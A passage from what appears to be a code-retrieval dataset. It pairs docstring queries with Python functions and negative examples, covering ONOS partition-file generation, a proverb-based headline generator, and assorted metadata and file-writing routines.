combine_stdout_stderr=True)\n if result.returncode != 0:\n msg = (('Devserver failed to start!\\n'\n '--- Start output from the devserver startup command ---\\n'\n '%s'\n '--- End output from the devserver startup command ---') %\n (result.output))\n logging.error(msg)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Generate custom metadata file in the root directory using the custom onosgenpartitions file which should also be located in the root directory. Note that this function needs to be run after the start function has been called for this instance.
|
def generateFile( self, nodes, equal=False, filename="cluster.json" ):
retValue = main.TRUE
try:
if self.component.handle:
assert self.component, "Component not specified. Please start the server first"
assert self.rootDir, "Root directory not found"
handle = self.component.handle
# cd to rootDir
handle.sendline( "cd " + str( self.rootDir ) )
handle.expect( "\$" )
cmd = "./onos-gen-partitions {} {} ".format( filename, nodes )
if equal:
cmd += "-e"
handle.sendline( cmd )
handle.expect( "\$" )
response = handle.before
# Return to home dir
handle.sendline( "cd " + self.component.home )
handle.expect( "\$" )
response += handle.before
if "Traceback" in response:
main.log.error( handle.before )
retValue = main.FALSE
else:
main.log.error( "Component handle is not set" )
retValue = main.FALSE
except Exception:
main.log.exception( "Error generating metadata file" )
return retValue
|
[
"def post_build_write_partitions(self):\n import yaml\n\n if self.database.exists():\n partitions = [\n p.identity.name.partital_dict for p in self.partitions]\n\n else:\n partitions = []\n\n fn = self.filesystem.path('meta', 'partitions.yaml')\n\n with open(fn, 'w') as f:\n yaml.safe_dump(\n partitions,\n f,\n default_flow_style=False,\n indent=4,\n encoding='utf-8')",
"def metadata_create_cmd():\n def processor(cm):\n print_cmd_status('Create the +metadata-extended and populate it')\n _, errors = cm.update_metadata_extended(overwrite=True)\n for e in errors:\n print_cmd_warning(e)\n return cm\n return processor",
"def generate_metadata(self):\n\n if not os.path.exists(self.output):\n os.makedirs(self.output)\n\n if self.options.profile == 'mercator':\n\n (south, west) = self.mercator.MetersToLatLon(self.ominx,\n self.ominy)\n (north, east) = self.mercator.MetersToLatLon(self.omaxx,\n self.omaxy)\n (south, west) = (max(-85.05112878, south), max(-180.0,\n west))\n (north, east) = (min(85.05112878, north), min(180.0, east))\n self.swne = (south, west, north, east)\n\n # Generate googlemaps.html\n\n if self.options.webviewer in ('all', 'google') \\\n and self.options.profile == 'mercator':\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'googlemaps.html')):\n f = open(os.path.join(self.output, 'googlemaps.html'\n ), 'w')\n f.write(self.generate_googlemaps())\n f.close()\n\n # Generate openlayers.html\n\n if self.options.webviewer in ('all', 'openlayers'):\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'openlayers.html')):\n f = open(os.path.join(self.output, 'openlayers.html'\n ), 'w')\n f.write(self.generate_openlayers())\n f.close()\n elif self.options.profile == 'geodetic':\n\n (west, south) = (self.ominx, self.ominy)\n (east, north) = (self.omaxx, self.omaxy)\n (south, west) = (max(-90.0, south), max(-180.0, west))\n (north, east) = (min(90.0, north), min(180.0, east))\n self.swne = (south, west, north, east)\n\n # Generate openlayers.html\n\n if self.options.webviewer in ('all', 'openlayers'):\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'openlayers.html')):\n f = open(os.path.join(self.output, 'openlayers.html'\n ), 'w')\n f.write(self.generate_openlayers())\n f.close()\n elif self.options.profile == 'raster':\n\n (west, south) = (self.ominx, self.ominy)\n (east, north) = (self.omaxx, self.omaxy)\n\n self.swne = (south, west, north, east)\n\n # Generate openlayers.html\n\n if self.options.webviewer in ('all', 'openlayers'):\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'openlayers.html')):\n f = open(os.path.join(self.output, 'openlayers.html'\n ), 'w')\n f.write(self.generate_openlayers())\n f.close()\n\n # Generate tilemapresource.xml.\n\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'tilemapresource.xml')):\n f = open(os.path.join(self.output, 'tilemapresource.xml'),\n 'w')\n f.write(self.generate_tilemapresource())\n f.close()\n\n if self.kml:\n\n # TODO: Maybe problem for not automatically generated tminz\n # The root KML should contain links to all tiles in the tminz level\n\n children = []\n (xmin, ymin, xmax, ymax) = self.tminmax[self.tminz]\n for x in range(xmin, xmax + 1):\n for y in range(ymin, ymax + 1):\n children.append([x, y, self.tminz])\n\n # Generate Root KML\n\n if self.kml:\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'doc.kml')):\n f = open(os.path.join(self.output, 'doc.kml'), 'w')\n f.write(self.generate_kml(None, None, None,\n children))\n f.close()",
"def create_metafile(root_data_dir, data_extension, output_filename, full_path=True):\n matches = []\n for root, dirnames, filenames in os.walk(root_data_dir):\n for filename in fnmatch.filter(filenames, '*.%s' % data_extension):\n matches.append(os.path.join(root, filename))\n\n matches = sorted(matches)\n\n names = [os.path.split(i) for i in matches]\n if not full_path:\n names = [ ('.', i[1]) for i in names ]\n\n labels = [ i[1].split('_')[0] for i in names]\n\n out = [ \"\\t\".join( [names[i][0] + '/' + names[i][1], labels[i] ] ) + \"\\n\" for i in xrange(len(labels)) ]\n\n output = open(output_filename, 'w')\n output.writelines(out)\n output.close()",
"def _generate_and_add_master_file_to_orchestrator_folder(folder):\n with open(os.path.join(folder, ORCH_MAIN_FILE), \"w\") as f:\n f.write(ORCH_STR_FILE)",
"def generate_mdata_filepath(self):\n\n # generate .mdata file name and folder\n mdata_name = os.path.basename(self.fpath).rpartition(\".\")[0]\n mdata_folder_name = os.path.basename(os.path.dirname(self.fpath))\n mdata_path = os.path.join(os.path.dirname(self.fpath), \"{}_mdata\".format(mdata_folder_name))\n \n # generate .mdata folder if not existent\n utils.make_dirs_if_not_existent(mdata_path)\n\n # generate and return proper .mdata file path\n return os.path.join(mdata_path, \"{}.mdata\".format(mdata_name))",
"def generate_file_system(self):\n logging.info('Start generating image \\'' + self.name + '\\' file system...')",
"def generate_dataset(input_folder: str, output_folder: str,\n generate_num: int, output_index_start: int, final_augment: bool = False) -> None:\n \n # defaults\n width = (1900, 2000) # min and max width\n height = (128, 140) # min and max height\n gt = \"simple\" # 'simple': label-string, 'boxfile': bounding boxes (may lead to errors with augmentation),\n # 'boxDisplay': bounding boxes + visualization during creation\n num_of_voices = 4 #\n\n empty_measure_chance = 3 # 1 in x chance\n empty_measure_width = (0, 120) # min and max width\n filled_measure_width = (240, 440) # min and max width\n\n side_measure_offset_x = (40, 80) # left and right side\n level_offset_y = (55, 105) # first and second level end\n block_offset_xy = ((2, 20), (5, 20)) # x and y direction min and max width\n symbol_offset_xy = (2, 2) # x and y direction offset\n\n background_offset = 20 # all sides margin\n border_image_chance = 5 # 1 in x chance\n prev_background_blend = (0.0, 0.25) # min and max blend\n\n background_images = load_labelset(os.path.join(input_folder, 'backgrounds'))\n\n duration_labelset = load_labelset_and_metadata(input_folder, 'duration')\n note_labelset = load_labelset_and_metadata(input_folder, 'note')\n rest_labelset = load_labelset_and_metadata(input_folder, 'rest')\n special_labelset = load_labelset_and_metadata(input_folder, 'special')\n\n files_per_folder = 1000\n show_progress_bar = True\n\n generator = RandomImageGenerator(image_width=width, image_height=height, num_of_voices=num_of_voices,\n background_images=background_images,\n duration_labelset=duration_labelset,\n note_labelset=note_labelset,\n rest_labelset=rest_labelset,\n special_labelset=special_labelset,\n background_offset=background_offset, border_image_chance=border_image_chance,\n prev_background_blend=prev_background_blend,\n empty_measure_chance=empty_measure_chance, empty_measure_width=empty_measure_width,\n filled_measure_width=filled_measure_width,\n side_measure_offset_x=side_measure_offset_x, level_offset_y=level_offset_y,\n block_offset_xy=block_offset_xy,\n symbol_offset_xy=symbol_offset_xy,\n final_augment=final_augment, gt=gt)\n\n generator.generate_random_rows_batch(generate_num=generate_num, output_index_start=output_index_start,\n output_folder=output_folder, files_per_folder=files_per_folder,\n show_progress_bar=show_progress_bar)",
"def _build_metadata(self):\n builder = os.path.join(self.dirname, 'metadata-builder.py')\n if not os.path.exists(builder):\n return\n\n log(\"{0} exists. Running it...\".format(builder))\n metadata = os.path.join(self.dirname, 'metadata.yaml')\n if os.path.exists(metadata):\n backup = os.path.join(self.dirname, 'metadata.yaml.bak')\n shutil.copy(metadata, backup)\n log(\"Existing {0} backed up to {1}\"\n .format(metadata, backup))\n\n if not (stat.S_IXUSR & os.stat(builder)[stat.ST_MODE]):\n raise ValueError(\n Fore.RED +\n \"{0} not executable\".format(builder) +\n Fore.RESET)\n cmds = ['./metadata-builder.py']\n retval = subprocess.check_call(cmds, cwd=self.dirname)\n\n if not os.path.exists(metadata):\n raise ValueError(\"Expected {0} but was not created by {1}\"\n .format(metadata, builder))",
"def maya_file_generator(root_path, skip='None', descend='True'):\n\n pass",
"def meta_file_inf(tmpdir_factory, pickle_file):\n meta_path = tmpdir_factory.mktemp(\"\").join(\"metadata_inf.pkl\")\n mock_dict = {\n 'group': [1, np.nan, 8],\n 'file_path': [str(pickle_file)] * 3,\n 'data_ok': [1, 1, 0]\n }\n mock_df = pd.DataFrame(mock_dict)\n mock_df.to_pickle(meta_path)\n return meta_path",
"def generate_files():\n \n # Generate a default job_file if necessary\n genfilename = \"job_file\"\n if os.path.exists(genfilename):\n logging.info(\"'job_file' already exists.\")\n else:\n genfile = open(genfilename, \"w\")\n genfile.write( \\\n \"username = '<user>'\\n\" \\\n \"nodes = [1]\\n\" \\\n \"foldername = 'experiment'\\n\" \\\n \"numreps = 1\\n\" \\\n \"exename = '<exe>'\\n\" \\\n \"exeinput = '%s'\\n\" \\\n \"exeseeds = 'integer'\\n\" \\\n )\n genfile.close()\n \n # Generate the config directory if necessary\n gendirname = \"config\"\n if os.path.exists(gendirname):\n logging.info(\"'config' directory already exists\")\n else:\n os.makedirs(gendirname)",
"def make_go_meta_files(mt: list) -> None:\n # mt = pickle.load(open(f\"{DATA_PATH}/mt_dgp.pkl\", \"rb\"))\n for i, ns_nsid in enumerate([(\"bp\", \"GO:0008150\"), (\"mf\", \"GO:0003674\"), (\"cc\", \"GO:0005575\")]):\n namespace, ns_id = ns_nsid\n ns_data = list()\n ns_data.append(ns_id)\n ns_data.append(mt[0]) # go_namespace\n ns_data.append(set(mt[i + 1])) # set of all go terms in namespace\n ns_data.append(mt[i + 1]) # list of all go terms in namespace\n ns_data.append(set().union(*mt[1:])) # all go terms\n ns_data.append({go_id: i for i, go_id in enumerate(mt[i + 1])}) # go_id: namespace\n pickle.dump(ns_data, open(f\"{DATA_PATH}/{namespace}_go_meta.pkl\", \"wb\"))",
"def generate_cluster_info(self):\n logger.info(\"Generating cluster information file\")\n\n # get kubeconfig and upload to httpd server\n kubeconfig = os.path.join(\n self.cluster_path, config.RUN.get(\"kubeconfig_location\")\n )\n remote_path = os.path.join(\n config.ENV_DATA.get(\"path_to_upload\"),\n f\"{config.RUN.get('run_id')}_kubeconfig\",\n )\n upload_file(\n config.ENV_DATA.get(\"httpd_server\"),\n kubeconfig,\n remote_path,\n config.ENV_DATA.get(\"httpd_server_user\"),\n config.ENV_DATA.get(\"httpd_server_password\"),\n )\n\n # Form the kubeconfig url path\n kubeconfig_url_path = os.path.join(\n \"http://\",\n config.ENV_DATA.get(\"httpd_server\"),\n remote_path.lstrip(\"/var/www/html/\"),\n )\n config.ENV_DATA[\"kubeconfig_url\"] = kubeconfig_url_path\n\n # get the infra_id\n infra_id = get_infra_id(self.cluster_path)\n config.ENV_DATA[\"infra_id\"] = infra_id\n\n # get the cluster id\n cluster_id = get_cluster_id(self.cluster_path)\n config.ENV_DATA[\"cluster_id\"] = cluster_id\n\n # fetch the installer version\n installer_version_str = run_cmd(\n f\"{config.RUN['bin_dir']}/openshift-install version\"\n )\n installer_version = installer_version_str.split()[1]\n config.ENV_DATA[\"installer_version\"] = installer_version\n\n # get the major and minor version of OCP\n version_obj = Version(installer_version)\n ocp_version_x = version_obj.major\n ocp_version_y = version_obj.minor\n config.ENV_DATA[\"ocp_version_x\"] = ocp_version_x\n config.ENV_DATA[\"ocp_version_y\"] = ocp_version_y\n\n # generate the cluster info yaml file\n terraform_var_template = \"cluster_info.yaml.j2\"\n terraform_var_template_path = os.path.join(\n \"ocp-deployment\", terraform_var_template\n )\n terraform_config_str = self._templating.render_template(\n terraform_var_template_path, config.ENV_DATA\n )\n terraform_var_yaml = os.path.join(\n self.cluster_path,\n constants.TERRAFORM_DATA_DIR,\n constants.SCALEUP_TERRAFORM_DATA_DIR,\n \"cluster_info.yaml\",\n )\n\n with open(terraform_var_yaml, \"w\") as f:\n f.write(terraform_config_str)\n\n # config.ENV_DATA['dns_server'] = config.ENV_DATA['dns']\n template_vars = (\n f\"\\\"dns_server: {config.ENV_DATA['dns']}\"\n f\"\\\\nremove_rhcos_worker: 'yes'\\\\n\\\"\"\n )\n\n replace_content_in_file(terraform_var_yaml, \"PLACEHOLDER\", template_vars)\n logger.info(f\"cluster yaml file: {terraform_var_yaml}\")",
"def master_info_writer(master_info, out_path, prefix):\n\n # Write general content\n out_file_name = 'low_frequency_gene_placement.tsv' # Previously 'low_frequency_gene_placement.tsv' - Proposed name: core_region_content.tsv\n if prefix is not None:\n out_file_name = f'{prefix}_{out_file_name}'\n with open(os.path.join(out_path, out_file_name), 'w', newline='', encoding='utf-8') as out_file:\n writer = csv.writer(out_file, delimiter=\"\\t\")\n\n # Create header\n header = ['Gff', 'Core_gene_1', 'Core_gene_2', 'Core_region_size',\n 'Core_region_accessory_count']\n writer.writerow(header)\n\n # Write remaining rows:\n for key in sorted(master_info.keys()):\n info = master_info[key][0:5]\n\n writer.writerow(info)\n\n # Write gene content in long format\n out_file_name = 'core_core_accessory_gene_content.tsv' # Previously core_core_accessory_gene_content.tsv - Proposed name: accessory_gene_placement.tsv\n if prefix is not None:\n out_file_name = f'{prefix}_{out_file_name}'\n\n with open(os.path.join(out_path, out_file_name), 'w', newline='', encoding='utf-8') as out_file:\n writer = csv.writer(out_file, delimiter=\"\\t\")\n\n # Create header\n header = ['Gff', 'Core_gene_1', 'Core_gene_2', 'gene', 'type']\n writer.writerow(header)\n\n # Write remaining rows:\n for key in sorted(master_info.keys()):\n core_core_region = master_info[key]\n if len(core_core_region[5]):\n for gene in core_core_region[5]:\n row = [core_core_region[0],\n core_core_region[1],\n core_core_region[2],\n gene,\n 'intermediate_frequency']\n writer.writerow(row)\n\n if len(core_core_region[6]):\n for gene in core_core_region[6]:\n row = [core_core_region[0],\n core_core_region[1],\n core_core_region[2],\n gene,\n 'low_frequency']\n writer.writerow(row)",
"def get_files_to_generate(self):\r\n pass",
"def create_metaxml(self):\n metaxml_path = os.path.join(self.bdist_dir, 'meta.xml')\n log.info(\"Writing %s\", metaxml_path)\n with open(metaxml_path, 'wb') as metaxml_file:\n root = ET.Element('root')\n id = ET.SubElement(root, 'id')\n id.text = '%s.%s' % (self.author_id, self.mod_id)\n version = ET.SubElement(root, 'version')\n version.text = self.mod_version\n name = ET.SubElement(root, 'name')\n name.text = self.distribution.get_name()\n description = ET.SubElement(root, 'description')\n description.text = self.distribution.get_description()\n xml_contents = ET.tostring(root, encoding='utf-8')\n xml_contents = minidom.parseString(xml_contents).toprettyxml(encoding='utf-8')\n metaxml_file.write(xml_contents)",
"def generate_mps_files(self):\n print(\"starting mps generation\")\n # setting antares options\n print(\"-- pre antares\")\n self.pre_antares()\n # launching antares\n print(\"-- launching antares\")\n antares_output_name = self.launch_antares()\n # writting things\n print(\"-- post antares\")\n lp_path = self.post_antares(antares_output_name)\n return lp_path",
"def process_mocs(tgen):\n\n # pylint: disable = invalid-name\n\n moc = getattr(tgen, 'moc', [])\n if not moc:\n return\n\n bld = tgen.bld\n bconfManager = getattr(bld, 'bconfManager', None)\n\n if not bconfManager:\n # it's called from a config action\n qt5.process_mocs(tgen)\n return\n\n rootdir = bconfManager.root.rootdir\n taskParams = getattr(tgen, 'zm-task-params')\n\n startNode = bld.getStartDirNode(taskParams['$startdir'])\n moc = getNodesFromPathsConf(bld, moc, rootdir)\n moc = _filterMocHeaders(moc)\n # moc headers as 'includes' paths must be relative to the startdir\n moc = [x.path_from(startNode) for x in moc]\n tgen.moc = moc\n\n qt5.process_mocs(tgen)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
This function, considering a given headline, applies methods to generate new expressions based on proverbs and chosen words (computed by different methods).
|
def headline_generator_v2(headline, use_expressions, model, dict_forms_labels, dict_lemmas_labels, gen_method,
headline_keywords=None, shorter_expressions=None):
print("[START] ", headline, "["+gen_method+"]")
all_generated_expressions = []
if not headline_keywords:
print("[WARNING] No headline keywords given, getting them now...")
nlpyport.load_config()
headline_tokens = get_tokens(headline)
headline_keywords = get_headline_keywords(headline, headline_tokens, dict_forms_labels, model, min=1, max=4)
# -------- Adaptation -----------
if headline_keywords:
if gen_method == SUBSTITUTION:
all_generated_expressions = substitution_many(use_expressions, headline_keywords, dict_forms_labels, dict_lemmas_labels, model)
elif gen_method == ANALOGY:
all_generated_expressions = analogy_many(use_expressions, headline, headline_keywords[:2], dict_forms_labels, dict_lemmas_labels, model)
elif gen_method == VEC_DIFF:
all_generated_expressions = vecdiff_many(use_expressions, headline_keywords[:2], dict_forms_labels, dict_lemmas_labels, model)
if shorter_expressions:
more_generated_expressions = substitution_many(shorter_expressions, headline_keywords, dict_forms_labels, dict_lemmas_labels, model)
if all_generated_expressions and more_generated_expressions:
all_generated_expressions.extend(more_generated_expressions)
elif more_generated_expressions:
all_generated_expressions = more_generated_expressions
if not all_generated_expressions:
print("[ERROR] Could not generate expression with "+gen_method)
return None
return all_generated_expressions
|
[
"def new_headline(head1, head2):\n print(head1, \" | \", head2)\n pn1 = get_ps(head1, list(['NNP', 'NNPS']))\n pn2 = get_ps(head2, list(['NNP', 'NNPS']))\n adj1 = get_ps(head1, list(['JJ']))\n adj2 = get_ps(head2, list(['JJ']))\n if random.choice([True, False]):\n pn_reps = list(zip(pn1, pn2))\n adj_reps = list(zip(adj1, adj2))\n head = head1\n else:\n pn_reps = list(zip(pn2, pn1))\n adj_reps = list(zip(adj2, adj1))\n head = head2\n success = False\n if len(pn_reps) :\n head = substitute(head, pn_reps)\n success = True\n if len(adj_reps) :\n head = substitute(head, adj_reps)\n if success:\n return head\n return False",
"def apply(self, name=\"\", headwords=None, spacing=\" \"):\n\n # check for sentence type in collection\n sentence = self.get(name)\n translation = self.get_translation(name)\n if not sentence or translation is None:\n print(f\"Failed to apply unidentified sentence named {name}\")\n return\n\n # expect full entries instead of tying this to dictionary with lookups\n # TODO: high-level sentence methods with lookups from the Language\n fetched_words = [\n entry for entry in headwords\n if isinstance(entry, dict) and set(entry).issuperset({'pos', 'sound', 'definition'}) \n ]\n\n # check that headwords match buildable sentence units\n if not isinstance(fetched_words, (list, tuple)):\n print(f\"Failed to apply sentence - expected headwords list not {headwords}\")\n return\n if len(sentence) != len(fetched_words):\n print(f\"Failed to apply sentence - number of headwords does not match fillable sentence units\")\n return len(fetched_words)\n \n # store final built units\n applied_sentence = []\n # peel apart unit-per-unit translation strings and unit reference indexes\n if translation:\n applied_translation, translation_indexes = list(zip(*translation))\n applied_translation = list(applied_translation)\n\n # iterate through both sentence units and headwords\n # - unit structure is (word_classes, properties)\n # - headwords is a map containing various representations of word and data\n for i, unit in enumerate(sentence):\n word_data = fetched_words[i]\n word_sounds = word_data['sound']\n word_pos = word_data['pos']\n word_definition = word_data['definition']\n unit_pos, unit_properties = unit\n # compare headword class to expected word class\n if word_pos not in unit_pos:\n #print(fetched_words)\n #print(unit)\n print(f\"Failed to apply sentence - word {word_sounds} part of speech {word_pos} does not match expected word class {unit_pos}\")\n return\n # create grammatical unit with headword and sentence unit properties\n built_unit = self.grammar.build_unit(\n word_sounds,\n properties=unit_properties,\n word_classes=word_pos\n )\n # add spacing separator and unit to sentence\n len(applied_sentence) > 0 and applied_sentence.append(spacing) \n [applied_sentence.append(unit_piece) for unit_piece in built_unit]\n\n # Translate the unit\n # step ahead if nothing to translate\n if not translation:\n continue\n # locate unit's related translation piece\n translation_index = translation_indexes.index(i)\n # format with headword at insertion symbol (see vet_translation)\n formatted_translation = applied_translation[translation_index].format(word_definition)\n applied_translation[translation_index] = formatted_translation\n\n # format and return sentence representation\n sentence_data = {\n 'sound': applied_sentence,\n 'change': applied_sentence, # TODO: run sound changes, s/c blocking spaces\n 'translation': applied_translation if translation else []\n }\n return sentence_data",
"def DefineHeadOfMatchPhrase(word):\n pass",
"def add_interpunction(self):\n for par in self.paragraphs:\n for observ in par.observations:\n\n # add a . after each sentence\n observ.observation_new += \".\"\n\n # add a capital letter at the beginning\n first_word = observ.observation_new.split()[0]\n # check if the first word is a number\n if not represents_integer(first_word):\n # first word is not an integer, so add capital letter\n observ.observation_new = observ.observation_new[0].capitalize() + observ.observation_new[1:]",
"def rules(terms_dataframe, text_dataframe):\n new_terms = []\n for terms in terms_dataframe['lemma']:\n # Get the same structure of terms as in text dataframe\n tmp = ' '.join(terms.split('-'))\n new_terms.append(tmp.split(' '))\n for i, token in enumerate(text_dataframe['lemma']):\n for j, t in enumerate(new_terms):\n # Case 1: term of size 3 seperated by dashes (ex: text-to-speech) and followed by 1, 2 Nouns or 1 Adj and 1 Noun is a term \n if len(t) == 3 and len(text_dataframe['lemma']) >= i + 5:\n if token == t[0] and text_dataframe['lemma'][i + 1] == '-' and (\n text_dataframe['lemma'][i + 2] == 'to' or text_dataframe['lemma'][i + 2] == 'of' or\n text_dataframe['lemma'][i + 2] == 'by' or text_dataframe['pattern'][i + 2] == 'N') and \\\n text_dataframe['lemma'][i + 3] == '-' and text_dataframe['lemma'][i + 4] == t[2]:\n # followed by 2 nouns (ex: text-to-speech modal synthesis)\n if (text_dataframe['pattern'][i + 5] == 'N' or text_dataframe['pattern'][i + 4] == 'A') and \\\n text_dataframe['pattern'][i + 6] == 'N':\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 6] = text_dataframe['tokens'][i + 6] + ']'\n elif text_dataframe['pattern'][i + 5] == 'N' or text_dataframe['pattern'][i + 5] == 'A':\n # followed by 1 noun (ex: text-to-speech system)\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 5] = text_dataframe['tokens'][i + 5] + ']'\n else:\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 4] = text_dataframe['tokens'][i + 4] + ']'\n # Case 2: term of size 2 separated by dashes (ex: encoder-decoder) and followed by 0,1,2 or 3 nouns is a term\n if len(t) >= 2 and len(text_dataframe['lemma']) >= i + 3 and i != 0:\n if token == 'front' and text_dataframe['lemma'][i + 1] == '-' and text_dataframe['lemma'][\n i + 2] == 'end':\n if text_dataframe['pattern'][i - 1] == 'N':\n text_dataframe['tokens'][i - 1] = '[' + text_dataframe['tokens'][i - 1]\n text_dataframe['tokens'][i + 2] = text_dataframe['tokens'][i + 2] + ']'\n if token == t[0] and text_dataframe['lemma'][i + 1] == '-' and text_dataframe['lemma'][i + 2] == t[1]:\n # followed by 3 nouns (ex: HMM-based generation synthesis approach)\n if text_dataframe['pattern'][i + 3] == 'N' and text_dataframe['pattern'][i + 4] == 'N' and \\\n text_dataframe['pattern'][i + 5] == 'N':\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 5] = text_dataframe['tokens'][i + 5] + ']'\n # followed by 2 nouns (ex: HMM-based generation synthesis)\n elif (text_dataframe['pattern'][i + 3] == 'N' or text_dataframe['pattern'][i + 3] == 'A' or\n text_dataframe['pattern'][i + 3] == 'V') and text_dataframe['pattern'][i + 4] == 'N':\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 4] = text_dataframe['tokens'][i + 4] + ']'\n # followed by 1 noun (ex: cross-lingual adaptation)\n elif text_dataframe['pattern'][i + 3] == 'N':\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 3] = text_dataframe['tokens'][i + 3] + ']'\n # followed by nothing (ex: mel-spectrogram)\n else:\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 2] = text_dataframe['tokens'][i + 2] + ']'\n if (\n token == 'data' or token == 'voice' or token == 'datum' or token == 'speaker' or token == 'dataset' or token == 'database' or token == 'feature' or token == 'corpus') and i != 0 and len(\n text_dataframe['lemma']) >= i + 1:\n if text_dataframe['pattern'][i - 1] == 'N' or text_dataframe['pattern'][i - 1] == 'A':\n text_dataframe['tokens'][i - 1] = '[' + text_dataframe['tokens'][i - 1]\n text_dataframe['tokens'][i] = text_dataframe['tokens'][i] + ']'\n elif text_dataframe['pattern'][i + 1] == 'N':\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 1] = text_dataframe['tokens'][i + 1] + ']'\n if i != 0:\n if text_dataframe['lemma'][i - 1] in rule_adj and '[' in text_dataframe['tokens'][i]:\n text_dataframe['tokens'][i - 1] = '[' + text_dataframe['tokens'][i - 1] + ']'\n elif i >= 3 and text_dataframe['lemma'][i - 1] in rule_adj and text_dataframe['lemma'][\n i - 3] == 'non' and '[' in text_dataframe['tokens'][i]:\n text_dataframe['tokens'][i - 3] = '[' + text_dataframe['tokens'][i - 3]\n text_dataframe['tokens'][i - 3] = text_dataframe['tokens'][i - 1] + ']'",
"def _compile_vocabulary(self, phrases):\n text = \" \".join([(\"<s> %s </s>\" % phrase) for phrase in phrases])\n self._logger.debug('Compiling languagemodel...')\n vocabulary = self._compile_languagemodel(text, self.languagemodel_file)\n self._logger.debug('Starting dictionary...')\n self._compile_dictionary(vocabulary, self.dictionary_file)",
"def analyseHeadlineSentiment(self, for_topics):\n\n if (for_topics):\n model = self.topic_model\n else:\n model = self.party_model\n\n headline = self.headline\n headline_polarity = TextBlob(headline).sentiment.polarity\n\n # Find the most likely topic of the headline\n headline_vectorized = self.getVectorised(headline)\n topic_binary_predictions = model.predict(headline_vectorized)\n topic_probabilities = model.predict_proba(headline_vectorized)[0][0]\n\n likely_topics = np.nonzero(topic_binary_predictions == True)[1]\n topic_probabilities = dict([(topic_index, round(topic_probabilities[topic_index], 1)) for topic_index in range(0, len(topic_probabilities)) if topic_index in likely_topics])\n\n # key = topic index, value = [sentiment score, counter (for averages)]\n headline_topics_matrix = {}\n\n for likely_topic in likely_topics:\n if (likely_topic != 0): # Ignore the junk topic\n if (likely_topic not in headline_topics_matrix):\n headline_topics_matrix[likely_topic] = 0\n\n weighted_polarity = headline_polarity * topic_probabilities[likely_topic]\n headline_topics_matrix[likely_topic] += weighted_polarity\n\n # Then, look for political people (entities)\n if (not for_topics):\n\n # Change to lower-case and strip accents\n preprocessed_headline = self.preprocessor.changeToLower(headline)\n preprocessed_headline = self.preprocessor.stripAccents(headline)\n\n # Check the entity tracker first, if we've already seen an MP previously\n for full_name, name_split in self.entity_tracker.items():\n search_forename = re.search(rf\".*{name_split[0]}.*\", preprocessed_headline, re.IGNORECASE)\n search_surname = re.search(rf\".*{name_split[1]}.*\", preprocessed_headline, re.IGNORECASE)\n search_full = re.search(rf\".*{full_name}.*\", preprocessed_headline, re.IGNORECASE)\n\n if ((search_forename or search_surname) and not search_full): # If either parts of the name appear (but not together)\n party_num = name_split[2]\n party_num = int(party_num)\n if (party_num not in headline_topics_matrix):\n headline_topics_matrix[party_num] = 0\n\n headline_topics_matrix[party_num] += headline_polarity\n\n\n # If the sentence contains an MP from a political party, get sentiment \n for mp_name, party_num in self.mps.items():\n party_num = int(party_num)\n search = re.search(rf\".*{mp_name}.*\", preprocessed_headline, re.IGNORECASE)\n if (search):\n if (party_num not in headline_topics_matrix):\n headline_topics_matrix[party_num] = 0\n\n headline_topics_matrix[party_num] += headline_polarity\n \n # Separate first and last name for advanced entity searching in future sentences in paragraph\n if (mp_name not in self.entity_tracker):\n self.entity_tracker[mp_name] = [mp_name.split(\" \")[0], mp_name.split(\" \")[1], party_num]\n\n # Bound\n for topic, score in headline_topics_matrix.items():\n if (score > 1):\n headline_topics_matrix[topic] = 1\n elif (score < -1):\n headline_topics_matrix[topic] = -1\n\n return headline_topics_matrix",
"def printsection(heading,optdict,typedict):\n from forcebalance.objective import Implemented_Targets\n from forcebalance.optimizer import Optimizer\n\n def FilterTargets(search):\n if type(search) == str:\n search = [search]\n list_out = []\n for key in sorted(Implemented_Targets.keys()):\n if any([i.lower() in key.lower() for i in search]):\n list_out.append(Implemented_Targets[key].__name__)\n return ', '.join(sorted(list_out))\n\n Answer = [heading]\n firstentry = 1\n Options = []\n for i in ['strings','allcaps','lists','ints','bools','floats','sections']:\n vartype = re.sub('s$','',i)\n for j in typedict[i]:\n Option = []\n val = optdict[j] if optdict is not None else typedict[i][j][0]\n if firstentry:\n firstentry = 0\n else:\n Option.append(\"\")\n Priority = typedict[i][j][1]\n Option.append(\"# (%s) %s\" % (vartype, typedict[i][j][2]))\n if len(typedict[i][j]) >= 4:\n Relevance = typedict[i][j][3]\n str2 = \"# used in: %s\" % Relevance\n if len(typedict[i][j]) >= 5:\n TargetName = FilterTargets(typedict[i][j][4])\n str2 += \" (%s)\" % TargetName\n else:\n TargetName = \"None\"\n Option.append(str2)\n else:\n Relevance = \"None\"\n Option.append(\"%s %s\" % (str(j),str(val)))\n Options.append((Option, Priority, TargetName, j))\n def key1(o):\n return o[1]\n def key2(o):\n return o[2]\n def key3(o):\n return o[3]\n Options.sort(key=key3)\n Options.sort(key=key2)\n Options.sort(key=key1, reverse=True)\n for o in Options:\n Answer += o[0]\n\n # PriSet = sorted(list(set(Priorities)))[::-1]\n # TgtSet = sorted(list(set(TargetNames)))\n # RelSet = sorted(list(set(Relevances)))\n # for p0 in PriSet:\n # ogrp = []\n # rgrp = []\n # tgrp = []\n # for o, 